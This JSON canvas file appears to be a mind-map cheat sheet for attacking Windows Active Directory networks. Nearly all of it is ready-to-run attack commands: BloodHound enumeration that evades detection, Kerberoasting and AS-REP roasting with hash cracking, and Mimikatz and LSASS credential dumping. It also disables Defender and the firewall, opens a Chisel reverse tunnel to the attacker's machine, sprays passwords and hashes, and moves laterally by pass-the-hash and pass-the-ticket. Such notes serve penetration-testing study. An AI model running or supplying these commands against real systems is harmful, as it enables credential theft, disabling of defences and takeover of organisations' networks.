{
	"nodes":[
		{"type":"group","id":"90e436d4ebc61d9c","x":2840,"y":860,"width":3450,"height":2700,"color":"#ff00f7","label":"Moving Forward"},
		{"type":"group","id":"2dd756717238c21c","x":2840,"y":-2000,"width":3450,"height":2550,"color":"4","label":"Enumeration is key"},
		{"type":"group","id":"0473ffc566ba808b","x":7200,"y":-1242,"width":3580,"height":2260,"color":"#2b00ff","label":"Lateral movement"},
		{"type":"group","id":"f5cee6bb422bd4de","x":-251,"y":-1520,"width":2611,"height":2271,"label":"Prepare yourself"},
		{"type":"group","id":"3a98df6f751ebbb9","x":-251,"y":960,"width":2691,"height":1931,"color":"1","label":"Got something valuable?"},
		{"type":"group","id":"7efda90313124809","x":3450,"y":-725,"width":2690,"height":1225,"color":"2","label":"Advanced Domain enumeration"},
		{"type":"group","id":"0851e37538dd9192","x":-251,"y":3040,"width":2691,"height":520,"color":"5","label":"Got something =>Username + password / hashes?"},
		{"type":"group","id":"ee2eb339561386be","x":3450,"y":-1840,"width":2420,"height":400,"color":"1","label":"Automated enumeration"},
		{"type":"group","id":"4fa4d2dea90f14e5","x":3450,"y":-1360,"width":1115,"height":560,"color":"3","label":"Manual enumeration"},
		{"type":"text","text":"```powershell\nInvoke-BloodHound -CollectionMethod All -ExcludeDC\n```","id":"f131413b4e7c588b","x":5190,"y":-1722,"width":620,"height":60},
		{"type":"text","text":"BloodHound Enumeration","id":"cb85e6e163a79cb9","x":3490,"y":-1650,"width":250,"height":80},
		{"type":"text","text":"SharpHound.ps1","id":"3b8d4f155033460c","x":4130,"y":-1752,"width":250,"height":60},
		{"type":"text","text":"SharpHound.exe","id":"56ff02ba22dd1037","x":4130,"y":-1640,"width":250,"height":60},
		{"type":"text","text":"BloodHound.py","id":"748d7f0fcbab6e47","x":4136,"y":-1538,"width":250,"height":60},
		{"type":"text","text":"BloodHound","id":"f52451b89294661e","x":3790,"y":-1640,"width":250,"height":60},
		{"type":"text","text":"```powershell\n.\\SharpHound.exe\n```","id":"25b05bbf95f234c3","x":4450,"y":-1640,"width":250,"height":60},
		{"type":"text","text":"```bash\npython3 /opt/BloodHound.py/bloodhound.py -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN.NAME> -ns $ip --zip \n```","id":"f5ec0b1dece68cee","x":4450,"y":-1538,"width":1110,"height":60},
		{"type":"text","text":"```powershell\n. .\\SharpHound.ps1\n```","id":"899a2c945ceed1b6","x":4450,"y":-1752,"width":250,"height":60},
		{"type":"text","text":"```powershell \nInvoke-BloodHound -CollectionMethod All\n```","id":"32802d6f9aacc6d5","x":4833,"y":-1803,"width":577,"height":60},
		{"type":"text","text":" Avoid detections like ATA","id":"5a9ab64a3769fa73","x":4833,"y":-1722,"width":311,"height":60},
		{"type":"text","text":"Found?","id":"4155aa3abad5aba1","x":5840,"y":80,"width":250,"height":60,"color":"#fb00ff"},
		{"type":"text","text":"Found?","id":"bbdfeb1a383411ba","x":5840,"y":310,"width":250,"height":60,"color":"#fb00ff"},
		{"type":"text","text":"Found?\n999% krbtgt/changepw not crackable","id":"c9d234a7c4e8ece4","x":5660,"y":-110,"width":430,"height":80,"color":"#fb00ff"},
		{"type":"text","text":"```powershell\n.\\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt\n```","id":"f2154382a392bf75","x":9422,"y":-682,"width":1258,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt\n```","id":"dcb7655e03e617c5","x":9422,"y":-602,"width":1260,"height":60},
		{"type":"text","text":"```bash\nimpacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt\n```","id":"18d2f498a3d01892","x":9422,"y":-522,"width":1260,"height":60},
		{"type":"text","text":"```powershell\nSet-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}\n```","id":"8c5b1c13f7799182","x":8823,"y":-55,"width":680,"height":80,"color":"3"},
		{"type":"text","text":"PowerView DEV Edition","id":"cf4d7c289281fa7b","x":8545,"y":-55,"width":218,"height":80,"color":"3"},
		{"type":"text","text":"Kerberoasting","id":"4844055e043c0d47","x":7925,"y":-185,"width":250,"height":60},
		{"type":"text","text":"Set SPN","id":"2bc53214c0d4999c","x":8284,"y":-45,"width":161,"height":60},
		{"type":"text","text":"ASREPRoast","id":"82a3c24f091607eb","x":7925,"y":393,"width":250,"height":60},
		{"type":"text","text":"Dumping Hashes","id":"904d95f578d06756","x":8345,"y":393,"width":250,"height":60},
		{"type":"text","text":"```powershell\n.\\Rubeus.exe kerberoast  /user:<user> /rc4opsec /outfile:hashes.txt\n```","id":"80206330f67b434e","x":9420,"y":-341,"width":1260,"height":60},
		{"type":"text","text":"```powershell\nRequest-SPNTicket -SPN \"<SPN>\" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt\n```","id":"0d148822e4211931","x":9420,"y":-245,"width":1262,"height":60},
		{"type":"text","text":"```bash\nimpacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt\n```","id":"ece7a6289f0fb80a","x":9420,"y":-155,"width":1260,"height":60},
		{"type":"text","text":"From memory to disk","id":"905f8d9418e4f561","x":9422,"y":-438,"width":250,"height":60},
		{"type":"text","text":"```mimikatz\nkerberos::list /export\n```","id":"101417f08fdebc41","x":9740,"y":-438,"width":375,"height":60},
		{"type":"text","text":"John","id":"fdab7601a7d16fd0","x":8973,"y":-1122,"width":145,"height":60},
		{"type":"text","text":"Hashcat","id":"3e7cc096cc59c0c5","x":8973,"y":-983,"width":145,"height":60},
		{"type":"text","text":"```bash\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt --format=krb5tgs\n```","id":"35ea496907458eff","x":9215,"y":-1122,"width":875,"height":60},
		{"type":"text","text":"```bash\nhashcat -m 13100 --force -a 0 hashes.txt <wordlist path>\n```","id":"c2dd84fa0d769d8a","x":9215,"y":-982,"width":875,"height":60},
		{"type":"text","text":"Found SPN","id":"b7599deb69c6b060","x":8284,"y":-322,"width":161,"height":60},
		{"type":"text","text":"Extract Hashes","id":"1e27b45ed2e771c6","x":8545,"y":-245,"width":250,"height":60},
		{"type":"text","text":"Cracking hashes","id":"89dd850306ce58ed","x":8573,"y":-1043,"width":250,"height":60},
		{"type":"text","text":"specific account","id":"3fd47559136803ab","x":9038,"y":-245,"width":250,"height":60},
		{"type":"text","text":"```powershell\nGet-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt\n```","id":"cc5a17fa961ee12d","x":9422,"y":-762,"width":1260,"height":60,"color":"3"},
		{"type":"text","text":"[Invoke-Kerberoast.ps1](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1)","id":"63adde7757e219c7","x":9422,"y":-842,"width":318,"height":60,"color":"5"},
		{"type":"text","text":"all accounts","id":"505c67de23375f15","x":9038,"y":-632,"width":250,"height":60},
		{"type":"text","text":"```powershell\nInvoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt\n```","id":"4b719bbf1532f447","x":9785,"y":-842,"width":895,"height":60},
		{"type":"text","text":"John","id":"fe246e1e2be3af1d","x":8745,"y":694,"width":145,"height":60},
		{"type":"text","text":"Cracking hashes","id":"e1e3e05b7d3abc59","x":8345,"y":773,"width":250,"height":60},
		{"type":"text","text":"Hashcat","id":"97f57e6e3a1b61ca","x":8745,"y":833,"width":145,"height":60},
		{"type":"text","text":"```bash\nhashcat -m 18200 --force -a 0 hashes.txt <wordlist path>\n```","id":"51034cd6fe2bdada","x":9025,"y":833,"width":659,"height":60},
		{"type":"text","text":"```bash\nimpacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt\n```","id":"f42470e692582858","x":9605,"y":440,"width":773,"height":87},
		{"type":"text","text":"GetNPUsers","id":"855a8a360e6f67a5","x":9130,"y":513,"width":164,"height":60},
		{"type":"text","text":"```bash\nimpacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt\n```","id":"af08fb2721436f3c","x":9605,"y":560,"width":773,"height":87},
		{"type":"text","text":"```bash\njohn --format=krb5asrep --wordlist=wordlist.txt hash.txt\n```","id":"da898169999526c3","x":9025,"y":693,"width":659,"height":60},
		{"type":"text","text":"with Creds","id":"b8934ffb4c8bd270","x":9365,"y":453,"width":179,"height":60},
		{"type":"text","text":"with users","id":"5729a8602ae78bc4","x":9365,"y":573,"width":179,"height":60},
		{"type":"text","text":"Lateral movement","id":"95fae785731c98c8","x":7440,"y":153,"width":250,"height":60},
		{"type":"text","text":"specific account","id":"e00455e2d87013d1","x":8745,"y":93,"width":250,"height":60},
		{"type":"text","text":"[ASREPRoast.ps1](https://github.com/HarmJ0y/ASREPRoast)","id":"f4cc5449005b5f70","x":9130,"y":93,"width":215,"height":60,"color":"5"},
		{"type":"text","text":"```powershell\n.\\Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt\n```","id":"6a60f8fa4e34c007","x":9130,"y":233,"width":775,"height":60},
		{"type":"text","text":"all accounts","id":"e8452882277ca9a0","x":8745,"y":333,"width":250,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt\n```","id":"b7f7eb3ad6c61a1d","x":9130,"y":333,"width":775,"height":60},
		{"type":"text","text":"```powershell\nGet-ASREPHash -UserName <USER> -Verbose\n```","id":"c2ac992ba044b8af","x":9396,"y":93,"width":509,"height":60},
		{"type":"text","text":"Dumping Credentials","id":"59f8e0be6f6e9228","x":-60,"y":1880,"width":250,"height":60},
		{"type":"text","text":"Tools","id":"8a2b3d30e048537c","x":400,"y":1220,"width":250,"height":60},
		{"type":"text","text":"MimiKatz","id":"04d2acacfe4b2082","x":740,"y":1220,"width":250,"height":60},
		{"type":"text","text":"```powershell\n.\\Chisel.exe client <Your_IP>:80 R:1080:socks\n```","id":"0d3ed392f22d0637","x":1261,"y":631,"width":559,"height":60},
		{"type":"text","text":"[On Pivoting Point](https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz)","id":"c4cbb38f978d7cd5","x":932,"y":631,"width":250,"height":60,"color":"5"},
		{"type":"text","text":"```bash\n./chisel server -p 80 --reverse\n```","id":"5058283d2c7e483e","x":1264,"y":521,"width":556,"height":60},
		{"type":"text","text":"[On your Kali](https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz)","id":"4eafa0fc185e0e01","x":932,"y":521,"width":250,"height":60,"color":"5"},
		{"type":"text","text":"Chisel","id":"efd20720b4789a34","x":560,"y":551,"width":250,"height":60},
		{"type":"text","text":"Pivoting","id":"a647ca71a4a59f89","x":200,"y":551,"width":250,"height":60},
		{"type":"text","text":"```cmd\nnetsh firewall set opmode disable\n```","id":"7715dd1ac5dc2416","x":932,"y":416,"width":468,"height":70},
		{"type":"text","text":"```cmd\nnetsh Advfirewall set allprofiles state off\n```","id":"3b27051bc6e980a3","x":1460,"y":421,"width":521,"height":60},
		{"type":"text","text":"Firewall","id":"8deb1a417cecd4c3","x":560,"y":421,"width":250,"height":60},
		{"type":"text","text":"Stop Securties","id":"9ef66571f848804c","x":200,"y":351,"width":250,"height":60},
		{"type":"text","text":"```powershell\nSet-MpPreference -DisableScriptScanning 1\n```","id":"9dc730259b2cf970","x":1240,"y":321,"width":741,"height":60},
		{"type":"text","text":"Disable AMSI","id":"bfded72faebe1105","x":937,"y":321,"width":250,"height":60},
		{"type":"text","text":"Defender","id":"9ee76002e08886f7","x":560,"y":271,"width":250,"height":60},
		{"type":"text","text":"Password Spray","id":"758f1b50f0cfd060","x":210,"y":3160,"width":250,"height":60},
		{"type":"text","text":"CrackMapExec","id":"6dd7fdd3d44b4ebe","x":545,"y":3160,"width":250,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec smb $ip -d <domain> -u users.txt -p passwords.txt\n```","id":"a388c141357c54ff","x":1364,"y":3124,"width":907,"height":60},
		{"type":"text","text":"Spray As Domain user","id":"51fc7cc8ad1c7c50","x":968,"y":3125,"width":255,"height":60},
		{"type":"text","text":"Get started with AD","id":"0077a1cb5066faad","x":-620,"y":40,"width":250,"height":60},
		{"type":"text","text":"Spraying","id":"a842f248ca7a5821","x":-160,"y":3269,"width":250,"height":50},
		{"type":"text","text":"```bash\ncrackmapexec smb $ip -u users.txt -p passwords.txt --local-auth\n```","id":"baa9f37b7a171ea7","x":1364,"y":3219,"width":907,"height":60},
		{"type":"text","text":"Spray As Local user","id":"4973a82b3b265c48","x":968,"y":3220,"width":255,"height":60},
		{"type":"text","text":"Advanced Domain Enumeration","id":"4a1d15613b0f93c4","x":3490,"y":-20,"width":250,"height":100},
		{"type":"text","text":"Kerberoasting","id":"6eddedb5c84cadad","x":3960,"y":0,"width":250,"height":60},
		{"type":"text","text":"ASREPRoast","id":"4382992ada97e77a","x":3960,"y":260,"width":250,"height":60},
		{"type":"text","text":"Hash Spray","id":"05e4c295d8a91639","x":210,"y":3350,"width":250,"height":60},
		{"type":"text","text":"CrackMapExec","id":"158945f6370c58a4","x":545,"y":3350,"width":250,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec smb $ip -d <domain> -u users.txt -H hashes.txt\n```","id":"7eaa47d5c522291c","x":1360,"y":3319,"width":916,"height":60},
		{"type":"text","text":"Spray As Domain user","id":"3d2a557917db3541","x":973,"y":3320,"width":250,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec smb $ip -u users.txt -H hashes.txt --local-auth\n```","id":"c6ca2de4915ab63b","x":1360,"y":3399,"width":916,"height":60},
		{"type":"text","text":"Spray As Local user","id":"afaccc06b3b9518d","x":973,"y":3399,"width":250,"height":60},
		{"type":"text","text":"MimiKatz","id":"1b5878317be2d465","x":740,"y":2440,"width":250,"height":60},
		{"type":"text","text":"CrackMapExec","id":"c205b1e0a9e609f3","x":740,"y":2590,"width":250,"height":60},
		{"type":"text","text":"SecretDump","id":"f7745bf4151bac9c","x":736,"y":2270,"width":250,"height":60},
		{"type":"text","text":"```mimikatz\n Invoke-Mimikatz -Command '\"lsadump::sam\"' \n```","id":"f7d0e61b28f87676","x":1066,"y":2440,"width":550,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <USER> -p <PASS> --sam\n```","id":"d3bba7b1711bee8b","x":1066,"y":2590,"width":550,"height":60},
		{"type":"text","text":"```bash\nimpacket-secretsdump -sam sam -security security -system system LOCAL\n```","id":"df3276c2cdff6138","x":1066,"y":2335,"width":781,"height":60},
		{"type":"text","text":"Scheduled Tasks","id":"fd7956c7d78f40bc","x":400,"y":2731,"width":250,"height":60},
		{"type":"text","text":"MimiKatz","id":"051cfffaf1c1df5c","x":736,"y":2731,"width":250,"height":60},
		{"type":"text","text":"```mimikatz\n Invoke-Mimikatz -Command '\"vault::cred /patch\"' \n```","id":"2e7081f599c2e1b1","x":1066,"y":2730,"width":550,"height":60},
		{"type":"text","text":"Local Creds\n(SAM)","id":"f7302f756d758a08","x":400,"y":2430,"width":250,"height":80},
		{"type":"text","text":"```cmd\nreg save HKLM\\system system\n```","id":"d69c6ffce62987a7","x":1266,"y":2088,"width":382,"height":60},
		{"type":"text","text":"```cmd\nreg save HKLM\\security security\n```","id":"7d90c3d1654839b5","x":1266,"y":2168,"width":382,"height":60},
		{"type":"text","text":"```cmd\nreg save HKLM\\sam sam\n```","id":"0fca41865f0fd62f","x":1266,"y":2008,"width":382,"height":60},
		{"type":"text","text":"```mimikatz\n Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"' \n```","id":"4ac55e284b87b4f8","x":1200,"y":1910,"width":647,"height":60},
		{"type":"text","text":"```mimikatz\n Invoke-Mimikatz -Command '\"sekurlsa::ekeys\"' \n```","id":"152a49a41762d498","x":1200,"y":1810,"width":647,"height":60},
		{"type":"text","text":"MimiKatz","id":"724d5f72cc196b36","x":740,"y":1870,"width":250,"height":60},
		{"type":"text","text":"CrackMapExec","id":"b8adcae143efb2f4","x":740,"y":1690,"width":250,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <USER> -p <PASS> --lsa\n```","id":"a5051450222b434c","x":1200,"y":1690,"width":647,"height":60},
		{"type":"text","text":"[lsassy](https://github.com/Hackndo/lsassy)","id":"d7f652a6ac9cc425","x":740,"y":1560,"width":250,"height":60,"color":"5"},
		{"type":"text","text":"```bash\nlsassy -u <USER> -H <NTLM> -d <domain.full> $ip --users\n```","id":"a3ba6b2d55cb6970","x":1200,"y":1560,"width":647,"height":60},
		{"type":"text","text":"[procdump](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump)","id":"18474b3bbfedcf6b","x":740,"y":1440,"width":250,"height":60,"color":"5"},
		{"type":"text","text":"Creds in memory\n(LSASS)","id":"556d952ab9cacda9","x":400,"y":1620,"width":250,"height":90},
		{"type":"text","text":"```powershell\nGet-Process -Name LSASS\n```","id":"6ac891e8c34ec0db","x":1071,"y":1440,"width":309,"height":60},
		{"type":"text","text":"```powershell\n.\\procdump.exe -ma <ProcNum> lsass.dmp\n```","id":"359958f41ce64b65","x":1440,"y":1440,"width":502,"height":60},
		{"type":"text","text":"mimikatz.exe","id":"40cc0d12228587d5","x":1123,"y":1065,"width":250,"height":60},
		{"type":"text","text":"```powershell\n.\\mimikatz.exe '\"sekurlsa::ekeys\"'\n```","id":"0f1d427b1c1b5763","x":1440,"y":1065,"width":560,"height":60},
		{"type":"text","text":"Invoke-Mimikatz.ps1","id":"6a51163c7d5339c6","x":1123,"y":1145,"width":250,"height":60},
		{"type":"text","text":"SharpKatz.exe","id":"c0ae3801019d702a","x":1123,"y":1225,"width":250,"height":60},
		{"type":"text","text":"pypykatz.exe","id":"ec927226eabf13af","x":1123,"y":1305,"width":250,"height":60},
		{"type":"text","text":"```powershell\n.\\SharpKatz.exe --Command ekeys\n```","id":"e3a7513df0fcfaa7","x":1440,"y":1225,"width":560,"height":60},
		{"type":"text","text":"```powershell\n Invoke-Mimikatz -Command '\"sekurlsa::ekeys\"'\n```","id":"da18d1a10f0865c3","x":1440,"y":1145,"width":560,"height":60},
		{"type":"text","text":"```powershell\n.\\pypykatz.exe live lsa\n```","id":"e3dca26307ac0931","x":1440,"y":1305,"width":560,"height":60},
		{"type":"text","text":"Password Hardening","id":"4d43dfc91c46a456","x":3960,"y":-320,"width":250,"height":60},
		{"type":"text","text":"```powershell\nFind-PSRemotingLocalAdminAccess.ps1\n```","id":"695d9fb168bcacbc","x":4325,"y":-437,"width":437,"height":60},
		{"type":"text","text":"```powershell\n$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' \"$([System.Text.Encoding]::ASCII.GetString($_.userPassword))\" -PassThru} | fl\n```","id":"759bfd3a606e0385","x":4324,"y":-343,"width":1057,"height":106,"color":"3"},
		{"type":"text","text":"```PowerView\nGet-DomainUser -PreauthNotRequired -Verbose\n```","id":"fdb95640e81b2faa","x":4362,"y":182,"width":798,"height":60,"color":"3"},
		{"type":"text","text":"```bash\nimpacket-GetNPUsers -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>\n```","id":"cad10dd899373df2","x":4362,"y":260,"width":798,"height":60},
		{"type":"text","text":"[ASREPRoast.ps1](https://github.com/HarmJ0y/ASREPRoast)","id":"461a0eee1ee6c591","x":4362,"y":340,"width":250,"height":60,"color":"5"},
		{"type":"text","text":"Set SPNs","id":"50631934574a82ae","x":4364,"y":80,"width":136,"height":60},
		{"type":"text","text":"```powershell\n.\\Rubeus.exe asreproast /nowrap\n```","id":"cdac9e84617c00aa","x":4364,"y":420,"width":497,"height":60},
		{"type":"text","text":"Find SPNs ","id":"3a41d73dd7cea161","x":4364,"y":-100,"width":138,"height":60},
		{"type":"text","text":"[Find-WMILocalAdminAccess.ps1](https://github.com/admin0987654321/admin1/blob/master/Find-WMILocalAdminAccess.ps1)","id":"6c6ddafe59b53aff","x":4325,"y":-517,"width":437,"height":60,"color":"5"},
		{"type":"text","text":"```powershell\nFind-LocalAdminAccess –Verbose\n```","id":"a1cbffb6ca3b1878","x":4325,"y":-597,"width":436,"height":60,"color":"3"},
		{"type":"text","text":"Local Admin Access","id":"347a2e28bfb6bf32","x":3960,"y":-517,"width":250,"height":60},
		{"type":"text","text":"Making sure user have no SPN","id":"85e74cbd9b18d444","x":4535,"y":70,"width":250,"height":80},
		{"type":"text","text":"```powershell\n.\\Rubeus.exe kerberoast /stats\n```","id":"588c6dde6faf17aa","x":4583,"y":-20,"width":404,"height":60},
		{"type":"text","text":"```powershell\nGet-DomainUser -SPN | select samaccountname,serviceprincipalname\n```","id":"36ef9ed319ac6aa4","x":4583,"y":-193,"width":798,"height":60,"color":"3"},
		{"type":"file","file":"AD/Mindmap/PowerView Enumeration.canvas","id":"278d505a13584cc9","x":4010,"y":-1280,"width":400,"height":400},
		{"type":"text","text":"```powershell\nInvoke-ASREPRoast -Verbose\n```","id":"6990e9d10e1c678b","x":4660,"y":340,"width":500,"height":60},
		{"type":"text","text":"PowerView DEV Edition","id":"503e9ce9f0be0063","x":4822,"y":70,"width":218,"height":80,"color":"3"},
		{"type":"text","text":"```powershell\nGet-DomainUser -Identity <USER> | select serviceprincipalname\n```","id":"3c6107edd272e88e","x":5100,"y":80,"width":680,"height":60,"color":"3"},
		{"type":"text","text":"```bash\nimpacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>\n```","id":"f0c636d3d10c7032","x":4583,"y":-100,"width":798,"height":60},
		{"type":"text","text":"Found?","id":"9657d418ab1e1b93","x":4980,"y":-517,"width":250,"height":60,"color":"#fb00ff"},
		{"type":"text","text":"PowerView Enumeration","id":"a47460f14c27574b","x":3490,"y":-1120,"width":250,"height":80},
		{"type":"text","text":"Enumeration","id":"adb3d461f59472ba","x":2920,"y":-1110,"width":250,"height":60},
		{"type":"text","text":"```bash\nevil-winrm -u <username> -H <Hash> -i <IP>\n```","id":"409903245dd288e4","x":3769,"y":2440,"width":635,"height":60},
		{"type":"text","text":"```bash\npth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd\n```","id":"510fe3d117fde271","x":3769,"y":2520,"width":635,"height":60},
		{"type":"text","text":"Enable RDP if needed","id":"95d23c94ed02f99d","x":3965,"y":2635,"width":250,"height":60},
		{"type":"text","text":"RDP","id":"e73c88fcee3ef5d7","x":3772,"y":2679,"width":115,"height":60},
		{"type":"text","text":"```bash\nimpacket-psexec -hashes \":<NTLM>\" <USER>@<IP>\n```","id":"d6ea3bf45ce75629","x":3769,"y":2190,"width":635,"height":60},
		{"type":"text","text":"```bash\nimpacket-wmiexec -hashes \":<NTLM>\" <USER>@<IP>\n```","id":"0bc538ecfae6d3b5","x":3769,"y":2269,"width":635,"height":60},
		{"type":"text","text":"Pass The Hash (PTH)","id":"062b97d96407e28e","x":3340,"y":2320,"width":250,"height":60},
		{"type":"text","text":"```bash\nimpacket-smbexec -hashes \":<NTLM>\" <USER>@<IP>\n```","id":"ea91d75b45ed4576","x":3769,"y":2350,"width":635,"height":60},
		{"type":"text","text":"```bash\nevil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>\n```","id":"121b8abcccc0cfbd","x":3769,"y":1920,"width":635,"height":60},
		{"type":"text","text":"RDP Access","id":"f1cd81a98f009729","x":3769,"y":2040,"width":250,"height":60},
		{"type":"text","text":"```bash\nxfreerdp /v:$ip /u:<username> /p:<password> /dynamic-resolution +clipboard /drive:share,/home/kali/project\n```","id":"5bd71e64eb3979cb","x":4119,"y":2100,"width":1168,"height":60},
		{"type":"text","text":"```bash\ncrackmapexec smb <IP> -u <username> -H <Hash> -x 'reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'\n```","id":"2abd98feab8ae4ea","x":4293,"y":2620,"width":994,"height":89},
		{"type":"text","text":"```bash\nrdesktop $ip -u <username> -p <password> -r disk:tmp=$(pwd)\n```","id":"b00524317a99bec9","x":4119,"y":2010,"width":1168,"height":60},
		{"type":"text","text":"```bash\nimpacket-psexec <<Domain>/<USER>:<PASS>@<IP>>\n```","id":"ac7164a9f90ba40f","x":3769,"y":1600,"width":635,"height":60},
		{"type":"text","text":"```bash\nimpacket-wmiexec <<Domain>/<USER>:<PASS>@<IP>>\n```","id":"892b75145cf6234f","x":3769,"y":1680,"width":635,"height":60},
		{"type":"text","text":"[WSManWinRM](https://github.com/bohops/WSMan-WinRM)\n","id":"9ec1be107d0d8c52","x":3769,"y":1840,"width":231,"height":60,"color":"5"},
		{"type":"text","text":"```powershell\nInvoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>\n```","id":"0e375ac6487d1028","x":4060,"y":1840,"width":931,"height":60},
		{"type":"text","text":"```bash\nimpacket-smbexec <<Domain>/<USER>:<PASS>@<IP>>\n```","id":"2f00aaf0b807e576","x":3769,"y":1760,"width":635,"height":60},
		{"type":"text","text":"Have Password ?","id":"22a63883b99488b5","x":3340,"y":1760,"width":250,"height":60},
		{"type":"text","text":"```bash\nimpacket-getTGT <domain.full>/<USER> -hashes \":<NTLM>\"\n```","id":"d34592e1e3f2c9b7","x":3769,"y":3180,"width":588,"height":60},
		{"type":"text","text":"```bash\nexport KRB5CCNAME=$(pwd)/<USER>.ccache\n```","id":"391a62e24fe8e811","x":4404,"y":3180,"width":445,"height":60},
		{"type":"text","text":"```bash\nimpacket-psexec <domain.full>/<USER>@<IP> -k -no-pass\n```","id":"5912e00a3c6fc6f5","x":4897,"y":3180,"width":595,"height":60},
		{"type":"text","text":"Pass The Ticket (PTT)","id":"10c9280ed5e79c17","x":3340,"y":3380,"width":250,"height":60},
		{"type":"text","text":"```powershell\n.\\Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt\n```","id":"abedb97fa57f2471","x":3769,"y":2891,"width":588,"height":60},
		{"type":"text","text":"```powershell\nwinrs -r:<HOST> cmd\n```","id":"5161e42253c311dd","x":4497,"y":2928,"width":440,"height":60},
		{"type":"text","text":"OverPass The Hash (OPTH)\nOR\nPass The Key (PTK)","id":"bbdd6900750a758b","x":3340,"y":3000,"width":250,"height":160},
		{"type":"text","text":"```mimikatz\nInvoke-Mimikatz -Command '\"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe\"'\n```","id":"bae28fef26892dc0","x":3769,"y":3050,"width":1177,"height":60},
		{"type":"text","text":"[WSManWinRM](https://github.com/bohops/WSMan-WinRM)\n","id":"638882c6242877ee","x":3779,"y":1340,"width":231,"height":60,"color":"5"},
		{"type":"text","text":"```bash\nwinrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd\n```","id":"454abf68514db5d5","x":3769,"y":1440,"width":635,"height":60},
		{"type":"text","text":"```powershell\n.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd\n```","id":"d3823a1d538abbd9","x":3769,"y":1520,"width":635,"height":60},
		{"type":"text","text":"```bash\nxfreerdp /v:<IP> /u:<username> /pth:<Hash>\n```","id":"688c7565f923e56d","x":3961,"y":2730,"width":886,"height":60},
		{"type":"text","text":"PS-Script","id":"8628997e66626c0f","x":3779,"y":1180,"width":231,"height":60},
		{"type":"text","text":"Script Block","id":"4652721f3f9c770d","x":3779,"y":1260,"width":231,"height":60},
		{"type":"text","text":"```powershell\nInvoke-WSManWinRM -hostname <HOST> -command cmd \n```","id":"4330f173e4da17a5","x":4087,"y":1340,"width":544,"height":60},
		{"type":"text","text":"```powershell\nEnter-PSSession -Session $sess\n```","id":"58460bb3c94be141","x":4719,"y":1180,"width":544,"height":60},
		{"type":"text","text":"```powershell\nInvoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}\n```","id":"c2ecec7aab0e635d","x":4719,"y":1260,"width":776,"height":60},
		{"type":"text","text":"winrs","id":"d118bcffe08bd1b3","x":3779,"y":1020,"width":231,"height":60},
		{"type":"text","text":"[PsExec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec)","id":"2bf059715d90d74b","x":3779,"y":1100,"width":231,"height":60,"color":"5"},
		{"type":"text","text":"Have Legal Access ?","id":"b7323bc0cf1657ef","x":3340,"y":1190,"width":250,"height":60},
		{"type":"text","text":"Accessing","id":"9c52e83abdc8f0d6","x":2870,"y":2320,"width":250,"height":60},
		{"type":"text","text":"```powershell\n.\\PsExec.exe -accepteula \\\\<HOST> cmd\n```","id":"466025a62ca41a85","x":4494,"y":2825,"width":443,"height":60},
		{"type":"text","text":"```powershell\n.\\Rubeus.exe ptt /tikcet:<base64 Ticket>\n```","id":"414fa763a3c1ccda","x":3772,"y":3423,"width":653,"height":60},
		{"type":"text","text":"```mimikatz\nInvoke-Mimikatz -Command '\"kerberos::ptt <C:\\Path\\To\\Ticket>\"'\n```","id":"81490e6b6e259eca","x":3772,"y":3320,"width":653,"height":60},
		{"type":"text","text":"```powershell\n.\\PsExec.exe -accepteula \\\\<HOST> cmd\n```","id":"c4813cbc19859ff4","x":4897,"y":3322,"width":500,"height":60},
		{"type":"text","text":"Access","id":"da8116bbfa1382eb","x":4535,"y":3363,"width":250,"height":60},
		{"type":"text","text":"```powershell\nwinrs -r:<HOST> cmd\n```","id":"071c10f69b542fd6","x":4897,"y":3402,"width":500,"height":60},
		{"type":"text","text":"```powershell\nwinrs -r:<HOSTNAME> cmd\n```","id":"893e1f907ec106f7","x":4087,"y":1020,"width":377,"height":60},
